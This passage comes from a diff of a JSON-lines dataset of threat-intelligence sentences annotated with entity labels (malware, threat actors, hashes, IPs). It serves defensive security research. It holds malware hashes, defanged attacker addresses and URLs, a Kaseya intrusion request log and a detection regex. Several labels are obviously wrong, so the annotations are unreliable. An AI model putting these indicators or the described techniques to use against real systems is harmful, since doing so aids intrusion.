2-list.rtf.","entities":[{"id":40086,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":40087,"label":"tools","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} +{"id":4314,"text":"The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).","entities":[{"id":50113,"label":"identity","start_offset":70,"end_offset":92},{"id":50112,"label":"EMAIL","start_offset":94,"end_offset":110}],"relations":[],"Comments":[]} +{"id":2667,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail and manufacturing.","entities":[],"relations":[],"Comments":[]} +{"id":2176,"text":"The playbook can be found on the XSOAR marketplace.","entities":[],"relations":[],"Comments":[]} +{"id":1615,"text":"The maximum cost per month should between 18 and 30 euros per month.","entities":[],"relations":[],"Comments":[]} +{"id":5079,"text":"In this blog, we will walk through the observed tactics, techniques and procedures, share relevant IOCs and analyze the exploit kit used by the attackers.","entities":[],"relations":[],"Comments":[]} +{"id":59,"text":"In fact, with the rise of specialized bitcoin mining hardware, no regular PC can make any significant amount of money for an attacker.","entities":[],"relations":[],"Comments":[]} +{"id":9483,"text":"Install module Login callback Enumerate RDP sessions","entities":[{"id":29120,"label":"malware","start_offset":40,"end_offset":43}],"relations":[],"Comments":[]} +{"id":9337,"text":"The website became inactive for months after that encounter in May.","entities":[],"relations":[],"Comments":[]} +{"id":5630,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} +{"id":5210,"text":" The longest running node was based on Connext DDS (at 139 seconds), which we kept as a reference.","entities":[],"relations":[],"Comments":[]} +{"id":2517,"text":"This makes Conti one of the greediest groups out there.","entities":[{"id":45558,"label":"threat-actor","start_offset":11,"end_offset":16}],"relations":[],"Comments":[]} +{"id":175,"text":"And unlike other attacks, ransomware attacks can\u2019t succeed \u201cjust a little.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":5292,"text":"In its core component, the first thing that the malware does is to check if its executable file name starts with \"[k\".","entities":[],"relations":[],"Comments":[]} +{"id":3318,"text":"The predefined list of offsets is used to locate where the decryption key and the user ID are embedded.","entities":[],"relations":[],"Comments":[]} +{"id":10793,"text":"Further investigation revealed several artifacts that could possibly link the malicious sample to the StrongPity APT group.","entities":[{"id":33005,"label":"location","start_offset":88,"end_offset":94},{"id":33006,"label":"threat-actor","start_offset":102,"end_offset":112},{"id":33007,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} +{"id":1949,"text":"Given this knowledge, organizations must be more vigilant in monitoring threats, as changes in one may mean that changes in others could follow.","entities":[],"relations":[],"Comments":[]} +{"id":12502,"text":"The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).","entities":[{"id":38909,"label":"malware","start_offset":4,"end_offset":12},{"id":38910,"label":"location","start_offset":92,"end_offset":95}],"relations":[],"Comments":[]} +{"id":10047,"text":"SSH backdoor","entities":[],"relations":[],"Comments":[]} +{"id":979,"text":" The infected apps are not limited to a single developer or third party store as many developers appear use the Taomike library.","entities":[{"id":46476,"label":"identity","start_offset":112,"end_offset":119}],"relations":[],"Comments":[]} +{"id":611,"text":" Globalizing the Attacks Figure 3 below is a map showing where our Unit 42 researchers have found webistes involved in Hancitor attacks.","entities":[{"id":46204,"label":"malware","start_offset":120,"end_offset":128},{"id":46205,"label":"identity","start_offset":68,"end_offset":87}],"relations":[],"Comments":[]} +{"id":4868,"text":"Unlike many hack-for-hire actors that use open source phishing frameworks like Evilginx or GoPhish, this group uses a custom phishing kit that utilizes Selenium, a self described 'suite of tools for automating web browsers.'","entities":[{"id":50868,"label":"tools","start_offset":79,"end_offset":87},{"id":50869,"label":"tools","start_offset":91,"end_offset":98},{"id":50870,"label":"tools","start_offset":152,"end_offset":160}],"relations":[],"Comments":[]} +{"id":6127,"text":"Of note, the PlugX sample in Table 8 uses a different certificate but was downloaded from the same website.","entities":[{"id":18957,"label":"tools","start_offset":13,"end_offset":18},{"id":18958,"label":"location","start_offset":19,"end_offset":25},{"id":18960,"label":"location","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} +{"id":2283,"text":"In the last few days, our team partnered with Internet infrastructure providers and hosting providers, including Cloudflare, to disrupt Glupteba\u2019s operation by taking down servers and placing warning interstitial pages in front of the malicious domain names.","entities":[{"id":45443,"label":"malware","start_offset":136,"end_offset":144},{"id":45442,"label":"identity","start_offset":113,"end_offset":123}],"relations":[],"Comments":[]} +{"id":1593,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":2938,"text":"But what we do see shows that this is a truly global operation.","entities":[],"relations":[],"Comments":[]} +{"id":6689,"text":" As more information becomes available on the nature of this attack, we will update this brief to provide additional details. d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 Source: Incident Overview and Technical Details, Kaseya 35.226.94[.]113 161.35.239[.]148 162.253.124[.]162 POST \/dl.asp curl\/7.69.1 GET \/done.asp curl\/7.69.1 POST \/cgi-bin\/KUpload.dll curl\/7.69.1 GET \/done.asp curl\/7.69.1 POST \/cgi-bin\/KUpload.dll curl\/7.69.1 POST \/userFilterTableRpt.asp curl\/7.69.1 Understanding REvil: The Ransomware Gang Behind the Kaseya Attack Threat Assessment: GandCrab and REvil Ransomware 2021 Unit 42 Ransomware Threat Report Breaking Down Ransomware Attacks Ransomware\u2019s New Trend: Exfiltration and Extortion Updated July 6, 2021, at 3:06 p.m. PT. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":20761,"label":"location","start_offset":72,"end_offset":76},{"id":20762,"label":"SHA1","start_offset":128,"end_offset":192},{"id":20763,"label":"SHA2","start_offset":193,"end_offset":257},{"id":20764,"label":"MD5","start_offset":258,"end_offset":322},{"id":20765,"label":"attack-pattern","start_offset":324,"end_offset":330},{"id":20766,"label":"location","start_offset":350,"end_offset":353},{"id":20767,"label":"IPV4","start_offset":381,"end_offset":396},{"id":20768,"label":"IPV4","start_offset":397,"end_offset":413},{"id":20769,"label":"IPV4","start_offset":414,"end_offset":431},{"id":20770,"label":"location","start_offset":433,"end_offset":437},{"id":20771,"label":"location","start_offset":484,"end_offset":488},{"id":20772,"label":"location","start_offset":548,"end_offset":552},{"id":20773,"label":"location","start_offset":586,"end_offset":590},{"id":20774,"label":"tools","start_offset":642,"end_offset":647},{"id":20776,"label":"malware","start_offset":714,"end_offset":722},{"id":20777,"label":"location","start_offset":723,"end_offset":726},{"id":20778,"label":"threat-actor","start_offset":727,"end_offset":732},{"id":20780,"label":"identity","start_offset":750,"end_offset":757},{"id":20781,"label":"location","start_offset":855,"end_offset":858},{"id":20783,"label":"location","start_offset":886,"end_offset":890},{"id":20784,"label":"TIME","start_offset":895,"end_offset":907},{"id":20785,"label":"location","start_offset":972,"end_offset":975},{"id":20786,"label":"location","start_offset":1001,"end_offset":1006}],"relations":[],"Comments":[]} +{"id":6626,"text":"They use spear-phishing attacks with a domain masquerading technique to make the links in their emails appear legitimate.","entities":[{"id":20564,"label":"location","start_offset":9,"end_offset":14},{"id":20565,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20566,"label":"attack-pattern","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} +{"id":4674,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} +{"id":1534,"text":"Microsoft also provided a workaround in cases where patches are not immediately possible.","entities":[{"id":46797,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":1091,"text":" Here\u2019s a more technical example.","entities":[],"relations":[],"Comments":[]} +{"id":2594,"text":"In December 2021, the Ministry of Health of Brazil fell victim to an attack claimed by Lapsus$ (Figure 2).","entities":[{"id":47778,"label":"TIME","start_offset":3,"end_offset":16},{"id":47780,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47779,"label":"identity","start_offset":22,"end_offset":50}],"relations":[{"id":351,"from_id":47780,"to_id":47779,"type":"targets"}],"Comments":[]} +{"id":3859,"text":"When we analyzed ANEL 5.1.1 rc, encrypted ANEL 5.1.2 rc1 was downloaded and executed.","entities":[{"id":49722,"label":"malware","start_offset":17,"end_offset":30},{"id":49723,"label":"malware","start_offset":42,"end_offset":56}],"relations":[],"Comments":[]} +{"id":9738,"text":"But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.","entities":[{"id":29709,"label":"malware","start_offset":37,"end_offset":47},{"id":29710,"label":"location","start_offset":61,"end_offset":64},{"id":29711,"label":"location","start_offset":93,"end_offset":96},{"id":29712,"label":"location","start_offset":123,"end_offset":127},{"id":29713,"label":"location","start_offset":158,"end_offset":163}],"relations":[],"Comments":[]} +{"id":3241,"text":"After the servers are established and running, the backdoor creates an execution root directory in the folder \u201c%PUBLIC%\/BPS\/V3\/\u201d.","entities":[{"id":48363,"label":"FILEPATH","start_offset":111,"end_offset":127}],"relations":[],"Comments":[]} +{"id":242,"text":"Many of these websites use cryptocurrency wallets (e.g., BTC, ETH) to accept payment (likely because these wallets are easy to set up and require no verification). We also find that some websites are mimicking popular donation websites or organizations to trick users into paying them money.","entities":[{"id":45940,"label":"SOFTWARE","start_offset":57,"end_offset":60},{"id":45941,"label":"SOFTWARE","start_offset":62,"end_offset":65}],"relations":[],"Comments":[]} +{"id":10673,"text":"Buffer","entities":[],"relations":[],"Comments":[]} +{"id":1503,"text":" Recently Palo Alto Networks discovered a backdoor program ( md5: b826fb1253a52a3b53afa3b7543d7694, sha256: 6bedd1b0716fe7632188932451f75295346836545e6d2bfee1b56121e02ca110 ) that is used to control a linux operating system.","entities":[{"id":45032,"label":"SHA2","start_offset":108,"end_offset":172},{"id":45033,"label":"identity","start_offset":10,"end_offset":28},{"id":45031,"label":"MD5","start_offset":66,"end_offset":98},{"id":45034,"label":"SOFTWARE","start_offset":201,"end_offset":223}],"relations":[{"id":220,"from_id":45031,"to_id":45032,"type":"related-to"}],"Comments":[]} +{"id":9103,"text":"The signature pattern ^[A-Z0-9]{4}$ was particularly effective in detecting URL patterns employed by Lurk from 2011 to 2013.","entities":[{"id":28103,"label":"threat-actor","start_offset":101,"end_offset":105}],"relations":[],"Comments":[]} +{"id":638,"text":" Unit 42 is unaware of ANY successful recovery after paying the ransom.","entities":[{"id":2124,"label":"identity","start_offset":1,"end_offset":8},{"id":2125,"label":"location","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} +{"id":13594,"text":" The third method is installing a malicious plugin embedded in a file named \u201cMakePlugin.tar.gz\u201d to the e-commerce framework.","entities":[{"id":51683,"label":"FILEPATH","start_offset":80,"end_offset":97}],"relations":[],"Comments":[]} +{"id":10801,"text":"The modified AndroidManifest.xml of the malicious app Overview of the inserted code","entities":[],"relations":[],"Comments":[]} +{"id":12533,"text":"The iOS exploit chain used a framework based on Ironsquirrel to encrypt exploits delivered to the victim's browser.","entities":[{"id":39008,"label":"malware","start_offset":48,"end_offset":60}],"relations":[],"Comments":[]} +{"id":1217,"text":"Except for LinkSMSPayment, all the IAP SDKs listed in this post do not notify the user in any way that they are taking actions against the user\u2019s daily SMS communication.","entities":[],"relations":[],"Comments":[]} +{"id":2019,"text":" However, a dead giveaway that the sample is packed is the raw size of the .text section, which is zeroed out, while the virtual size is much larger, as expected; this is identical to a .UPX0 section.","entities":[],"relations":[],"Comments":[]} {"id":359,"text":" While most vendors released patches for their products months ago it remains up to the users and administrators to ensure those patches are deployed.","entities":[],"relations":[],"Comments":[]} -{"id":360,"text":"As the OpenSSL library is so widely used, some administrators may be finding unpatched systems for years to come.","entities":[{"id":44717,"label":"SOFTWARE","start_offset":7,"end_offset":22}],"relations":[],"Comments":[]} -{"id":361,"text":"While network-based defenses are not a substitute for patching software, Heartbleed is detectable using IPS signatures.","entities":[{"id":46056,"label":"vulnerability","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} -{"id":362,"text":"Palo Alto Networks deployed five signatures in April to defend against this threat, 40039, 36420, 36419, 36418 and 36416.","entities":[{"id":46057,"label":"identity","start_offset":0,"end_offset":18},{"id":46058,"label":"TIME","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} -{"id":363,"text":" No matter how well patched your systems are, there’s no reason not to deploy IPS signatures like these to detect and block attempted Heartbleed exploits.","entities":[{"id":44718,"label":"vulnerability","start_offset":134,"end_offset":144}],"relations":[],"Comments":[]} -{"id":364,"text":"If you’ve already deployed signatures and your logs are showing attempted exploits, consider blocking or monitoring the IP addresses sending the requests.","entities":[],"relations":[],"Comments":[]} -{"id":365,"text":"A Heartbleed probe could be evidence of the early stages of an attack on your network, and persistent attackers are unlikely to give up after jiggling the handle on the front door.","entities":[{"id":46059,"label":"vulnerability","start_offset":2,"end_offset":12}],"relations":[],"Comments":[]} -{"id":366,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":367,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":368,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":369,"text":"This post is also available in: 日本語 (Japanese) On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application.","entities":[{"id":44719,"label":"TIME","start_offset":56,"end_offset":63},{"id":44720,"label":"identity","start_offset":64,"end_offset":72},{"id":44721,"label":"SOFTWARE","start_offset":189,"end_offset":211}],"relations":[],"Comments":[]} +{"id":1410,"text":"Truly yours, Clerk to the Court.","entities":[],"relations":[],"Comments":[]} +{"id":14318,"text":"We also stumbled upon a Chrome extension plugin (VirtualGirlfriend.crx) that Windows users can contract upon visiting hxxp:\/\/miakhalifagame[.]com.","entities":[{"id":48541,"label":"SOFTWARE","start_offset":24,"end_offset":31},{"id":48542,"label":"SOFTWARE","start_offset":77,"end_offset":85},{"id":48544,"label":"URL","start_offset":118,"end_offset":145},{"id":48543,"label":"malware","start_offset":49,"end_offset":70}],"relations":[],"Comments":[]} +{"id":12886,"text":" Figure 6 - FIN7 evaluation environment with Trend Micro solution placement for both detection and prevention scenarios.","entities":[{"id":40143,"label":"threat-actor","start_offset":16,"end_offset":20},{"id":40145,"label":"location","start_offset":99,"end_offset":102}],"relations":[],"Comments":[]} +{"id":11375,"text":"It was last updated on July 29, 2022.","entities":[],"relations":[],"Comments":[]} +{"id":13912,"text":"A Darkside ransom note ","entities":[],"relations":[],"Comments":[]} +{"id":3144,"text":"While many providers describe themselves as \u201ccustomer obsessed,\u201d few come close to our long-time partner in the lengths it goes to earn and retain the trust of its customers.","entities":[],"relations":[],"Comments":[]} +{"id":13917,"text":"Reports say that, based on the leak sites, there are at least 90 victims affected by DarkSide.","entities":[{"id":48739,"label":"malware","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} +{"id":3162,"text":"Once they add the AWS tool to our virtual patching, vulnerability scanning, lateral movement detection, posture management and other capabilities, joint customers will have a powerful set of integrated offerings to deliver simple, all-in-one cloud security and compliance.","entities":[{"id":48282,"label":"SOFTWARE","start_offset":18,"end_offset":26}],"relations":[],"Comments":[]} +{"id":4537,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors\u2019 ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50332,"label":"identity","start_offset":18,"end_offset":33},{"id":50333,"label":"location","start_offset":214,"end_offset":218},{"id":50334,"label":"location","start_offset":231,"end_offset":235}],"relations":[],"Comments":[]} +{"id":637,"text":"As of 13:00 UTC on June 28thth, approximately 4 Bitcoin have been transferred to the attacker's wallet.","entities":[{"id":46227,"label":"TIME","start_offset":6,"end_offset":28}],"relations":[],"Comments":[]} +{"id":2629,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":12506,"text":"This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.","entities":[{"id":38918,"label":"location","start_offset":73,"end_offset":83},{"id":38919,"label":"malware","start_offset":151,"end_offset":159}],"relations":[],"Comments":[]} +{"id":2738,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":4449,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} +{"id":3357,"text":"Organizations can also help protect their end users by implementing security solutions that provide a multilayered defense system that helps with detecting, scanning, and blocking malicious URLs.","entities":[],"relations":[],"Comments":[]} +{"id":439,"text":" When unauthorized coin mining happens with the site owner\u2019s knowledge and permission, it\u2019s basically a malicious site.","entities":[{"id":46121,"label":"attack-pattern","start_offset":6,"end_offset":30}],"relations":[],"Comments":[]} +{"id":13837,"text":"Rather than directly disabling these two functions, this method of using API hooking makes noticing malicious behaviors more difficult, especially since both functions still work and return results normally.","entities":[{"id":42901,"label":"attack-pattern","start_offset":77,"end_offset":84},{"id":42902,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} +{"id":14327,"text":"Twitter homepage of Round Year Fun hxxp:\/\/www[.]roundyearfun[.]org is a portal that promotes games on Twitter.","entities":[{"id":48552,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":48553,"label":"URL","start_offset":36,"end_offset":66},{"id":48554,"label":"SOFTWARE","start_offset":102,"end_offset":109}],"relations":[],"Comments":[]} +{"id":6971,"text":"This is not particularly novel for the APT group \u2014 in 2018, it used StealthAgent (detected by Trend Micro as AndroidOS_SMongo.HRX), an Android spyware that can intercept phone calls and messages, track victims\u2019 locations, and steal photos.","entities":[{"id":21824,"label":"location","start_offset":39,"end_offset":42},{"id":21826,"label":"malware","start_offset":68,"end_offset":80},{"id":21828,"label":"location","start_offset":156,"end_offset":159},{"id":21829,"label":"location","start_offset":182,"end_offset":185},{"id":21830,"label":"location","start_offset":222,"end_offset":225}],"relations":[],"Comments":[]} +{"id":1276,"text":" These Sysget variants appear to be a first stage payload in these attacks.","entities":[{"id":46650,"label":"malware","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} +{"id":1244,"text":"However, users need to be protected from PUAs and malware that abuses the SMS-based IAP.","entities":[],"relations":[],"Comments":[]} +{"id":14360,"text":"The attackers behind Maikspy have changed domains and IP addresses over the years, but all were found hosted in a publicly traded internet domain registrar and web hosting company in the U.S.","entities":[{"id":51786,"label":"malware","start_offset":21,"end_offset":28},{"id":51787,"label":"location","start_offset":187,"end_offset":191}],"relations":[],"Comments":[]} +{"id":13199,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":3564,"text":"The module\u2019s property name is \u201cKurdishCoderProducts\u201d, with a value shown to be \u201cConfuserEx v1.0.0-custom\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":671,"text":"Microsoft will also force a different file extension (.docm instead of .docx for new documents containing macros).","entities":[{"id":46247,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":4712,"text":"In 2017, Android \u2013 which is owned by Google \u2013 was the first mobile platform to warn users about NSO Group\u2019s Pegasus spyware.","entities":[{"id":50601,"label":"TIME","start_offset":3,"end_offset":7},{"id":50602,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50603,"label":"identity","start_offset":37,"end_offset":43},{"id":50604,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50605,"label":"malware","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} +{"id":960,"text":"The library also registers a receiver named com.zdtpay.Rf2b for both the SMS_RECEIVED and BOOT_COMPLETED actions with highest priority of 2147483647.","entities":[],"relations":[],"Comments":[]} +{"id":1413,"text":"Twelve of the 53 scanners on virustotal.com now detect the first variant of the malware, but only three detect the latest version.","entities":[{"id":45011,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} +{"id":6091,"text":"We believe the shift to deliver BazarLoader, along with some other indicators such as a unique Cobalt Strike profile (described by RiskIQ) further confirms the existence of a relationship between EXOTIC LILY and actions of a Russian cyber crime group tracked as WIZARD SPIDER (CrowdStrike), FIN12 (Mandiant, FireEye) and DEV-0193 (Microsoft).","entities":[{"id":18809,"label":"location","start_offset":45,"end_offset":50},{"id":18812,"label":"location","start_offset":188,"end_offset":195},{"id":18814,"label":"location","start_offset":208,"end_offset":211},{"id":18818,"label":"threat-actor","start_offset":291,"end_offset":296},{"id":18821,"label":"location","start_offset":317,"end_offset":320}],"relations":[],"Comments":[]} +{"id":5182,"text":" We also looked at each implementation\u2019s real-time publish-subscribe (RTPS) packet, as DDS is dependent on its own lower layer standard protocol.","entities":[],"relations":[],"Comments":[]} +{"id":5375,"text":" Although it cannot be used as proof of attribution, the preceding code reminded us of a routine from the third-stage code of VPNFilter\u2019s process called \u201cdstr\u201d that was intended to \u201cbrick\u201d the infected device.","entities":[{"id":51370,"label":"malware","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} +{"id":865,"text":"Examples of files that might be encrypted include financial documents, home movies, photos, or business-related files.","entities":[],"relations":[],"Comments":[]} +{"id":1466,"text":"More key pairs can be found in developer forums and academic research.","entities":[],"relations":[],"Comments":[]} +{"id":1494,"text":"We encourage developers to reconsider their stance on this issue and where necessary make changes before a significant security event happens.","entities":[],"relations":[],"Comments":[]} +{"id":13048,"text":"Navigating Gray Clouds: The Importance of Visibility in Cloud Security","entities":[],"relations":[],"Comments":[]} +{"id":1427,"text":"These certificates do not have to be generated by a certificate authority and can instead be self-signed.","entities":[],"relations":[],"Comments":[]} +{"id":3795,"text":"Infection Chain for the current ChessMaster campaign","entities":[{"id":49658,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} +{"id":1255,"text":"See the \u201cMalware Details\u201d section for analysis of the three RATs and two additional backdoors deployed in this persistent attack campaign.","entities":[],"relations":[],"Comments":[]} +{"id":14045,"text":"This includes samples from the older SLUB campaign in 2019 and the new version that supports Mattermost.","entities":[{"id":47201,"label":"SOFTWARE","start_offset":93,"end_offset":103},{"id":43497,"label":"malware","start_offset":37,"end_offset":41}],"relations":[],"Comments":[]} +{"id":2218,"text":"As an example, in the event apcups.dll was selected, the malware would write the downloaded file to apcups.exe in the same folder.","entities":[{"id":47322,"label":"FILEPATH","start_offset":100,"end_offset":110}],"relations":[],"Comments":[]} +{"id":11790,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":36355,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":36356,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} +{"id":2884,"text":"The Vector object is named \u2018s\u2019 and the Sound object is named \u201css\u201d in the Flash files used in all three exploits.","entities":[{"id":48081,"label":"SOFTWARE","start_offset":73,"end_offset":78}],"relations":[],"Comments":[]} +{"id":3050,"text":" On January 20, we reported this issue to Google and two days later, they removed the app from Google Play.","entities":[{"id":48128,"label":"identity","start_offset":42,"end_offset":48},{"id":48127,"label":"TIME","start_offset":4,"end_offset":14},{"id":48129,"label":"SOFTWARE","start_offset":95,"end_offset":106}],"relations":[],"Comments":[]} +{"id":7319,"text":" Figure 19. URLs related to mihannevis[.]com as seen on VirusTotal ","entities":[],"relations":[],"Comments":[]} +{"id":10627,"text":"This application had approximately 1,000 total installs.","entities":[],"relations":[],"Comments":[]} +{"id":5749,"text":"Why Running a Privileged Container in Docker is a Bad Idea","entities":[],"relations":[],"Comments":[]} +{"id":2639,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail, and manufacturing.","entities":[],"relations":[],"Comments":[]} +{"id":590,"text":" In our latest Unit 42 research on cybercriminals using the Hancitor malware, we show that not only are their attacks about business, we can see these cybercriminals deftly applying some fundamental business principles around timing, specialization, and globalization.","entities":[{"id":46181,"label":"identity","start_offset":15,"end_offset":22},{"id":46182,"label":"malware","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} +{"id":5395,"text":"It should be noted that these victims do not appear to be evidently valuable targets for either economic, military, or political espionage.","entities":[],"relations":[],"Comments":[]} +{"id":11350,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} +{"id":8846,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":2443,"text":" While testing our Threat Prevention signatures, we observed additional scanning activity that included the exploit code within the data section of the HTTP POST request, as seen in Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":229,"text":"populated with the targeted employee\u2019s email address, and the user is then prompted to enter in their password in order to view a sensitive document as shown in Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":3911,"text":"Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.","entities":[{"id":49762,"label":"vulnerability","start_offset":99,"end_offset":138},{"id":49763,"label":"malware","start_offset":32,"end_offset":49}],"relations":[{"id":865,"from_id":49763,"to_id":49762,"type":"exploits"}],"Comments":[]} +{"id":14079,"text":"While analyzing multiple samples, we found indicators of this strategy across the various campaigns.","entities":[],"relations":[],"Comments":[]} +{"id":5173,"text":"It is used in various critical sectors such as healthcare, transportation, industrial internet of things (IIoT), robotics, aeronautics, and the military, among others.","entities":[],"relations":[],"Comments":[]} +{"id":5517,"text":"Data breaches are so often in the news headlines today, that you could be forgiven for becoming a little desensitized.","entities":[],"relations":[],"Comments":[]} +{"id":538,"text":" Besides encrypting files on infected hosts, the main feature of ransomware is, of course, the demand for ransom.","entities":[],"relations":[],"Comments":[]} +{"id":6041,"text":"Attacker-Owned Websites: Compromised Websites (Feb 7 - Feb 9): Exploitation URLs:","entities":[],"relations":[],"Comments":[]} +{"id":7564,"text":" Figure 2. Korean language (left), simplified Chinese language (right) Microsoft Office instructions on how to enable macro Figure 3.","entities":[{"id":23602,"label":"tools","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} +{"id":3075,"text":"Virus Shield was downloaded over 30,000 times, fare fewer than this latest piece of Scareware, although we do not know how many users actually paid for the $4.99 monthly service before Google removed the app from the store.","entities":[{"id":45762,"label":"identity","start_offset":185,"end_offset":191},{"id":45763,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} +{"id":2691,"text":"This is a subset of our current Courses of Action initiative and will be updated as the project progresses.","entities":[],"relations":[],"Comments":[]} +{"id":13843,"text":"Since the API hooking shellcode adopts a generic approach, the similar code snippet might be used to target other products in the future and make the activities of Waterbear harder to detect. Tactic Technique ID Description Execution Execution","entities":[{"id":42918,"label":"attack-pattern","start_offset":14,"end_offset":21},{"id":42919,"label":"location","start_offset":101,"end_offset":107},{"id":42920,"label":"location","start_offset":137,"end_offset":140}],"relations":[],"Comments":[]} +{"id":12003,"text":"We received leads from FireEye that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":904,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":5487,"text":"hayat22 quickly lost interest and stopped replying to him altogether.","entities":[{"id":51487,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":891,"text":"All instances of the entire PClock family have been found to use this particular registry key.","entities":[{"id":44901,"label":"malware","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} +{"id":7295,"text":"Plist file ~\/Library\/LaunchAgents\/com.apple.marcoagent.voiceinstallerd.plist","entities":[],"relations":[],"Comments":[]} +{"id":14193,"text":"Although they may not have a choice if called upon to support the Kremlin, this incident will certainly give many Russian ransomware actors a reason to think twice about joining the war effort.","entities":[],"relations":[],"Comments":[]} +{"id":8742,"text":"We terminated 2 YouTube channels as part of our investigation into coordinated influence operations linked to Myanmar.","entities":[],"relations":[],"Comments":[]} +{"id":2931,"text":" First, this is a young campaign.","entities":[],"relations":[],"Comments":[]} +{"id":3429,"text":" fb812a2ccdab0a9703e8e4e12c479ff809a72899374c1abf06aef55abbbf8edc","entities":[{"id":10320,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} +{"id":5,"text":"The first stage downloaded the ransomware from these sites:","entities":[],"relations":[],"Comments":[]} +{"id":4112,"text":"The first of the decrypted content contains a magic number used to check data in the second block, a command code, and the XOR key to decrypt the second set of encrypted content.","entities":[],"relations":[],"Comments":[]} +{"id":55,"text":"Enter \u201cThe Bubble\u201d \u2013 Where We Are Now","entities":[],"relations":[],"Comments":[]} +{"id":12760,"text":"Use private key authentication when you have SSH enabled inside your instance.","entities":[],"relations":[],"Comments":[]} +{"id":9758,"text":"This backdoor has some features similar to a previously discovered version of the Muddywater backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":13712,"text":"It also protects cloud file sharing from threats and data loss by controlling sensitive data usage.","entities":[],"relations":[],"Comments":[]} +{"id":12010,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[],"relations":[],"Comments":[]} +{"id":14103,"text":"While this code may have some related \u201cinternet code sharing post\u201d origin, both samples share it.","entities":[],"relations":[],"Comments":[]} +{"id":4201,"text":"Application layer protocol: web protocols T1095 Non-Application layer protocol T1090.001 Proxy: Internal Proxy Exfiltration T1567.002","entities":[{"id":50010,"label":"attack-pattern","start_offset":0,"end_offset":47},{"id":50011,"label":"attack-pattern","start_offset":48,"end_offset":88},{"id":50012,"label":"attack-pattern","start_offset":89,"end_offset":133}],"relations":[],"Comments":[]} +{"id":4460,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android 